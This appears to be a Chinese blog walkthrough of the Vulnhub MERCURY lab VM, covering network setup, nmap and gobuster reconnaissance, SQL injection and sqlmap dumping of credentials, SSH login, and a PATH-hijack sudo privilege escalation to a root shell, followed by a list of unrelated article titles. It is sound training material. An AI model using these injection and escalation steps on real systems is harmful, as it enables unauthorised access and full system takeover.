当前位置：首页 > article >正文

Vulnhub靶机实战：MERCURY提权全记录（附环境配置避坑指南）

article 2026/3/25 4:15:03

Vulnhub靶机实战MERCURY渗透全流程与网络配置避坑指南在网络安全学习过程中Vulnhub靶机因其丰富的实战场景和多样化的漏洞组合成为安全爱好者提升技能的绝佳选择。MERCURY作为Vulnhub平台上的一款入门级靶机虽然难度不高但完整呈现了从信息收集到权限提升的标准渗透测试流程。本文将详细记录从环境搭建到最终提权的完整过程特别针对VirtualBox与VMware网络兼容性问题提供解决方案帮助初学者避开照着教程做却连不上靶机的常见陷阱。1. 环境准备与网络配置1.1 靶机下载与导入MERCURY靶机可从Vulnhub官网获取下载链接通常为OVA格式文件。需要注意的是该靶机原生支持VirtualBox环境若使用VMware Workstation导入可能会遇到网络适配问题。建议优先使用VirtualBox进行实验若必须使用VMware可尝试以下转换步骤# 将OVA转换为VMware兼容格式 ovftool Mercury.ova Mercury.vmx1.2 网络模式选择与互通配置确保攻击机(Kali Linux)与靶机处于同一网络环境是渗透测试的前提。推荐采用NAT网络模式具体配置要点如下VirtualBox设置全局设定 → 网络 → 添加NAT网络如NatNetwork靶机网络设置 → 选择NAT网络 → 选择刚创建的NatNetworkKali虚拟机同样选择该NatNetworkVMware兼容方案1. 编辑虚拟机设置 → 网络适配器 → 自定义特定虚拟网络 2. 确保Kali和靶机选择相同的VMnet通常为NAT模式下的相同VMnet 3. 若仍无法互通可尝试将靶机改为桥接模式注意完成配置后建议在Kali中执行ip addr show查看本机IP然后使用arp-scan -l扫描同网段设备确认靶机IP可达。1.3 常见连接问题排查当遇到网络不通时可按以下步骤排查检查虚拟机网络适配器状态VirtualBox确保启用网络连接已勾选VMware确认网络适配器已连接验证IP分配# Kali中查看自身IP ifconfig eth0 # 扫描同网段主机 nmap -sn 192.168.56.0/24防火墙干扰排除临时关闭Kali防火墙sudo ufw disable检查靶机是否限制ICMP响应2. 信息收集与漏洞扫描2.1 主机发现与端口扫描使用Nmap进行基础扫描是渗透测试的标准起点。针对MERCURY靶机建议采用分层扫描策略# 快速存活检测 sudo nmap -sn 10.10.10.0/24 -oN host_scan.txt # 全端口扫描TCP sudo nmap -sT --min-rate 10000 -p- 10.10.10.6 -oN full_port.txt # 服务版本探测 sudo nmap -sT -sC -sV -O -p22,8080 10.10.10.6 -oN service_scan.txt # 漏洞脚本扫描 sudo nmap --scriptvuln -p22,8080 10.10.10.6 -oN vuln_scan.txt扫描结果通常显示开放22(SSH)和8080(HTTP)端口。值得注意的是8080端口运行的非标准Web服务而是某种HTTP代理应用这为后续渗透提供了方向。2.2 Web应用目录枚举当直接访问8080端口仅返回简单维护页面时目录爆破成为必要手段。推荐使用Gobuster配合中等规模字典gobuster dir -u http://10.10.10.6:8080 \ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \ -x php,html,txt -o web_scan.txt若常规爆破无果可尝试以下技巧修改HTTP请求头如添加X-Forwarded-For尝试非常规文件扩展名.bak, .swp等检查robots.txt或crossdomain.xml等标准文件3. Web渗透与漏洞利用3.1 非常规路径发现技巧在目录爆破无果时故意访问不存在的路径如/aaa可能触发应用报错泄露有价值信息。MERCURY靶机正是通过这种方式暴露了隐藏的/mercuryfacts目录。这种技巧在实际渗透中尤为实用错误诱导法尝试/admin,/test,/backup等常见但可能不存在的路径观察错误页面是否泄露路径、框架信息参数探测# 使用curl测试参数 curl -v http://10.10.10.6:8080/mercuryfacts/13.2 SQL注入利用实战当发现/mercuryfacts/1可能存在SQL注入时可先用手动测试确认漏洞# 测试单引号触发错误 curl http://10.10.10.6:8080/mercuryfacts/1 # 测试布尔条件 curl http://10.10.10.6:8080/mercuryfacts/1 and 11 curl http://10.10.10.6:8080/mercuryfacts/1 and 12确认存在注入后使用sqlmap自动化利用# 获取数据库列表 sqlmap -u http://10.10.10.6:8080/mercuryfacts/1 --dbmsmysql --dbs # 获取mercury数据库表结构 sqlmap -u http://10.10.10.6:8080/mercuryfacts/1 --dbmsmysql -D mercury --tables # 导出users表数据 sqlmap -u http://10.10.10.6:8080/mercuryfacts/1 --dbmsmysql -D mercury -T users --dump获取的凭据通常为以下格式usernamepasswordjohnjohnny1987webmastermercuryisthesizeof0.056Earths4. 权限提升与后渗透4.1 初始访问与信息收集使用获得的凭据通过SSH登录ssh webmaster10.10.10.6 # 密码mercuryisthesizeof0.056Earths登录后应立即开展信息收集检查家目录隐藏文件ls -la ~查找SUID/GUID文件find / -perm -4000 2/dev/null查看可写目录find / -writable 2/dev/null检查计划任务crontab -l4.2 横向移动技巧在webmaster账户下发现notes.txt文件内含疑似base64编码的凭据# 解码示例 echo bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg | base64 -d获得linuxmaster账户凭据后切换用户su linuxmaster # 密码mercuryisthesizeof0.056Earths4.3 特权升级环境变量劫持关键步骤分解检查sudo权限sudo -l # 输出显示可运行/usr/bin/check_syslog.sh分析脚本内容cat /usr/bin/check_syslog.sh # 发现使用tail命令读取日志创建恶意软链接ln -s /bin/vi tail劫持PATH环境变量export PATH.:$PATH执行提权sudo --preserve-envPATH /usr/bin/check_syslog.sh # 进入vi后执行!bash5. 渗透测试中的思维训练MERCURY靶机虽然技术难度不高但完整呈现了渗透测试的标准思维流程。以下几点值得特别关注错误处理信息的价值404页面可能泄露关键路径开发者注释的重要性See List页面暗示了数据库结构最小权限原则的突破从webmaster到linuxmaster的权限跃迁环境变量攻击面PATH滥用导致的权限提升实际渗透中遇到的网络连接问题往往比漏洞利用本身更耗时。建议初学者建立标准的排查清单虚拟机网络模式是否匹配NAT/NAT网络防火墙规则是否阻止通信iptables/ufwIP地址是否在同一子网ip addr show靶机服务是否正常监听netstat -tulnp掌握这些基础问题的解决方法才能将更多精力集中在真正的安全技术研究上。

Vulnhub靶机实战：MERCURY提权全记录（附环境配置避坑指南）

相关文章：

Vulnhub靶机实战：MERCURY提权全记录（附环境配置避坑指南）

DolphinScheduler实战：如何用YAML+Go打造高效离线数据治理平台（附完整配置）

从CycleGAN到StarGAN：手把手拆解语音风格迁移中的GAN家族应用与避坑指南

MogFace人脸检测效果惊艳展示：大角度旋转+严重遮挡场景检测结果集

Ubuntu22.04实战：从零到一，手把手教你用LLamaFactory微调并部署专属大模型

Tinke：NDS游戏文件全能编辑器深度解析与实战指南

Sandboxie沙盒启动故障深度排查：从驱动加载到服务修复的完整解决方案

OpenClaw+nanobot自动化办公：邮件整理与回复实战

别再死记硬背C-V曲线了！用Silvaco仿真带你亲手‘画’出MOS电容的四种工作模式

RuoYi-Vue-Plus：企业级分布式应用开发的架构革新与实践指南

告别手动配置！Spring Authorization Server 1.2.1 实现 OAuth2.0 客户端自动注册（保姆级教程）

de4dot：解决.NET程序集反混淆难题的跨平台解决方案

payload-dumper-go：Android OTA包高效解压工具，释放系统镜像价值

MONAI新手避坑：ArrayDataset加载JPG/RGB图像报错？手把手教你正确配置与格式转换

避坑指南：Ollama离线安装时容易忽略的5个权限问题（实测Ubuntu 22.04）

3步唤醒沉睡算力：Amlogic S905X3电视盒子的Armbian系统改造指南

嵌入式Linux系统开发：Qwen-Turbo-BF16在树莓派的轻量化部署

【2026 MCP采样黄金配置手册】：基于23家头部云厂商实测数据的Sampling Rate动态决策模型

用Zeek分析PCAP文件的完整流程：从基础命令到日志处理技巧

【Python扩展模块编译错误终极指南】：20年C/Python混合开发老兵亲授5类高频报错的根因定位与秒级修复法

探究虚幻引擎中TAA与TSR对角色眨眼动画的模糊影响及优化方案

STM32F103C8T6 HAL库实战：PWM+DMA驱动WS2812B实现动态灯光效果

Librosa 0.11.0：音频分析效率革命，处理时间缩短近半的颠覆式突破

中科院计算机考研复试机试：从线上手写到机房上机，我用CodeBlocks和VS踩过的坑

别再死记公式了！用NumPy和PyTorch实战理解向量点积（dot product）

FireRedASR-AED-L场景应用：自媒体采访录音转文字稿的本地解决方案

我们的人生意义，不在远方的世俗成功里，就在我们日日生活的烟火人间里：父母至亲；好好吃饭，好好生活，为人民服务

深度解析：Inpaint-web如何彻底改变浏览器端图像修复工作流？

Qwen3-Embedding-4B多场景落地：HR政策问答机器人、IT运维知识图谱补全、合同条款语义审查

Astyle代码格式化工具：如何在VSCode中配置出最适合你的代码风格（附RT-thread配置示例）